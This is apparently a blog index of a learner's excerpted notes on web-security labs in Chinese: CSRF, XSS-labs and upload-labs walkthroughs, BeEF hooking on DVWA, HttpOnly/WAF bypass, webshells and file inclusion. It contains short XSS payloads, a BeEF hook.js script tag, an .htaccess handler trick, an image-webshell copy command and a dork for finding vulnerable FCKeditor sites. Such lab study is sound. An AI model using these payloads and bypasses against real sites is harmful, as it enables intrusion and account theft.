CSRF以及SSRF
CSRF基本原理CSRF(Cross-site Request Forgery,跨站请求伪造)是一种针对网站的恶意利用。CSRF攻击可以利用用户已经登陆或已经授权的状态,伪造合法用户发出请求给受信任的网点,从而实现在未授权的情况下执行一些特权操作。CSRF与XSS听起来很像,但攻击方式完全不同。XSS攻击是利用受信任的站点攻击客户端用户,而CSRF是伪装成受信任的用户攻击受信任的站点。参考:CSRF漏洞详解:https://blog.csdn.net/xcxhzjl/article/details/121411039
实现前提●用户成功登陆了网站系统,能执行授权的功能。!!!●目标用户访问了攻击者构造的恶意URL,比如恶意引导用户点击含有恶意URL的网址。
基本操作CSRF–pikachu演示:5:00检测有无CSRF漏洞:11:401、一般存在于有修改、更新、删除个人信息的页面。2、可以xss配合csrf。
CSRF防御方案1、当用户发送重要的请求时需要输入原始密码。2、设置随机 Token。(最有效)Token:相当于是每一个数据包的编号,若检测当前数据包的Token对应不上,则直 ...
XSS-labs通关little心得
获取cookie:<script>alert(document.cookie)</script>
level-1修改name属性的值,发现页面回显也随之变化,那么我们便可以考虑向此处插入js语句
1<script>alert(1)</script>
点击搜索,成功,直接进入下一关。
level-2直接在搜索框插入以下语句
1<script>alert(1)</script>
发现通关失败。右键-查看元素发现js语句被””号扩了起来,发挥不了作用,那么我们直接利用闭合的思想。填入payload,点击搜索,成功通关。
1"><script>alert(1)</script>
level-3来到第三关,啥也不想,直接把上一关的通关语句填入,失败,那好继续查看元素。发现很奇怪,明明就像第二关一样,利用了闭合的思想,那为什么还是通关不了。这里要用到代码审计,查看源码后端利用htmlspecialchars()函数会将特殊字符进行转义,这里无法采用标签,因为标签都是带有”<”的。但 ...
利用beef实现简单的XSS跨站攻击
前期准备实验环境:kali、BeEF、Ubuntu、DVWA若kali没有配置好BeEF,请参考此文章进行配置:https://blog.csdn.net/weixin_44657888/article/details/124692782若Ubuntu没有搭建好DVWA,请参考此文章进行搭建:https://blog.csdn.net/ydj2200012810/article/details/132009415
开日首先在kali启动BeEF服务。开启后,会自动跳转至登录界面,用户名默认为beef,密码在首次启动beef-xss时需要手动设置。成功登陆后,进入beef主界面然后在Ubuntu打开DVWA,选择存储型XSS名字任意填,消息栏填入以下语句即可
1<script src="http://127.0.0.1:3000/hook.js"></script>
注意,由于前端代码对输入的消息长度有限制,这就导致我们不能完整地输入攻击语句,这个好办右键框框的位置–检查–找到maxlength,改大些而且这里要将你的ip地址换成你的真实ip地 ...
XSS跨站代码以及绕过
XSS跨站绕过过滤的思路与方法httponly绕过什么是httponly在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击。注意并不能防止xss漏洞,只能是防止cookie被盗取。
绕过httponly绕过 httponly:利用账号密码进入1、若浏览器未保存帐号密码:需要 xss 产生登录地址(前提是XSS漏洞需要存在于登录框),利用表单劫持(相当于发一份给跨站平台,一份发给服务器验证)。2、若浏览器保存帐号密码:浏览器读取帐号密码。如何绕过httponly:8:00
XSS跨站代码绕过(偏教程演示–配合代码审计)靶场练习(重点):37:00
WAF绕过(以安全狗为例)常见WAF绕过思路1、标签语法替换
12<script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input> <tex ...
跨站订单盗取与webshell箱子反杀
演示简单的XSS订单系统XSS盲打_平台跨站演示:3:00postman下载地址:https://www.postman.com/downloads/
拓展拓展–可二刷(没怎么看懂,好像是通过XSS跨站脚本远程盗取cookie到自己的主机上并保存):15:00-34:30
webshell箱子系统XSS盲打_工具基础名词认识1、后门(backdoor):后门一般是指绕过安全性控制而获取对程序或系统访问的程序,后门原本是开发者预留的用来后期修改程序或系统中存在的威胁,但是由于黑客对后门的恶意使用,使得后门成为了计算机安全得一大威胁,一旦计算机系统或程序中的后们被黑客发现,那么黑客就能轻易地通过后门达到入侵目标计算机 的目的。常见的后门包括:(网页后门)(线程插入后门)(扩展后门)(C/S后门)。后门包括网页后门。2、网站后门(webshell):Webshell就是以asp、php、jsp或cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。Webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,JSP脚本木马,也有基于.NET的脚本木马。根据时代 ...
xss跨站基本知识
XSS跨站XSS跨站定义跨站点脚本攻击,简称XSS,是指攻击者利用网站存在的漏洞,通过在网站中注入恶意脚本代码,从而使得用户在访问该网站时受到攻击。这些恶意脚本代码通常是JavaScript 代码,它们可以窃取用户的敏感信息,如用户名、密码等,并将这些信息发送到攻击者的服务器。和用户交互的地方均有可能产生跨站漏洞。
XSS跨站原理XSS攻击的本质是利用Web应用程序中的漏洞,向网页注入恶意脚本代码,然后将这些代码嵌入到网页中,当其他用户访问这个网页时,恶意脚本将会被执行。攻击者通常会在Web应用程序的输入框、评论框、搜索框等可输入内容的地方输入特定的脚本代码,这些代码可以被Web应用程序直接插入到网页中,导致网页上的所有用户都会受到攻击。
1是前端漏洞,感觉和SQL注入差不多,只不过注入的是js语句。js脚本能实现什么,XSS就能实现什么。
XSS跨站前提条件1、浏览器内核版本(IE、或其他高版本浏览器禁用js脚本)。2、js代码的编写。XSS详解
XSS跨站分类1、反射型(危害较小,后端语言进行数据处理)(1)、需要用户(被攻击者)去触发,相当于一次交互的过程。(2)、!! 发包 x ...
记录upload-labs通关过程
使用upload-labs靶场环境:WIN10,php5.3.29
Pass-01代码审计,为js脚本,明显的前端验证(形同虚设),直接禁用js即可。也可以使用第二关的思路,直接抓包,保证MIME值为png/jpg/gif的类型即可。
Pass-02代码审计,发现仅仅是验证MIME属性。直接抓包,保证MIME值为png/jpg/gif的类型即可。
Pass-03(!)代码审计,发现过滤类型为黑名单验证,但不完整。php、php2、php3、php4、php5、php6、php7、pht、phtm、phtml等都会被当成php代码执行,所以上传一个这类类型的文件即可。
Pass-04(!)发现上述类型的也被列入了黑名单,那么可以使用.htaccess(配置文件)文件上传。在upload-labs目录下创建一个.htaccess文件,内容为
123<FilesMatch "shana">SetHandler application/x-httpd-php</FilesMatch>
意思就是如果文件里面有一个 ...
文件上传--WEB编辑器安全、CMS与WAF
文件拼接小技巧:33:00-34:00;略微判断有无解析漏洞:35:00cmd中,copy 1.png /b + shell.php /a webshell.jpg
文件上传–解析漏洞编辑器安全与WAFWEB编辑器漏洞常见编辑器fckeditor expueditor 漏洞利用在网上找fckeditor漏洞inurl:fckeditor site:edu.cnhttps://blog.csdn.net/eldn__/article/details/9197521编辑器是网站管理员对图片、音频视频进行操作的中转站,大部分编辑器是文件上传漏洞。FCK编辑器演示:50:00
CMS编辑器漏洞对网站进行识别,判断出是什么CMS。在发现某个网站是使用哪套开源的程序源码,上网搜漏洞。演示:1:09:00
总结思路(测试文件上传漏洞)在拿到一个网站,若要测试其上传漏洞:0、WAF的判断以及绕过。1、先尝试直接绕过,黑/白名单/内容过滤绕过。2、看中间件确定是否存在解析漏洞。3、CMS也会爆出一些文件上传漏洞,利用网上资料。4、编辑器漏洞,同上方法。5、C ...
文件上传--内容逻辑绕过与解析漏洞
内容逻辑绕过(排除了解析漏洞等,限制只可上传图片,那么就使用内容逻辑绕过的思路)有些上传文件时的验证不是单单判断文件后缀是否为黑名单/白名单,而是判断文件头(比如png与gif的文件头不一样)/获取的图像信息(判断是否为图片),这种情况下可以转换内容逻辑绕过的思想。
文件包含漏洞(不属于文件上传)实现内容逻辑绕过原理: 文件包含漏洞是指应用程序未对用户输入的文件路径或文件名进行充分的验证和过滤,导致攻击者可以通过向应用程序发送恶意文件路径或文件名来获取敏感信息或执行恶意代码的漏洞。(将被包含的文件以后门的格式去执行)这种漏洞主要发生在应用程序中使用了动态文件包含的情况下。利用文件包含漏洞的原理时,需要满足以下两个条件: 1.目标系统存在动态文件包含的功能。(?) 2.应用程序未进行适当的输入验证和过滤,使攻击者能够在文件包含参数中注入恶意代码。文件包含漏洞分析参考
图片马(让图片含有后门代码)配合文件包含可以实现文件上传文件包含漏洞实现文件上传:3:00
关于文件包含漏洞自己的一些思考与感悟虽然在图片格式中插入后门代码,图片仍然可以正常打开查看,但是此时仍然是 ...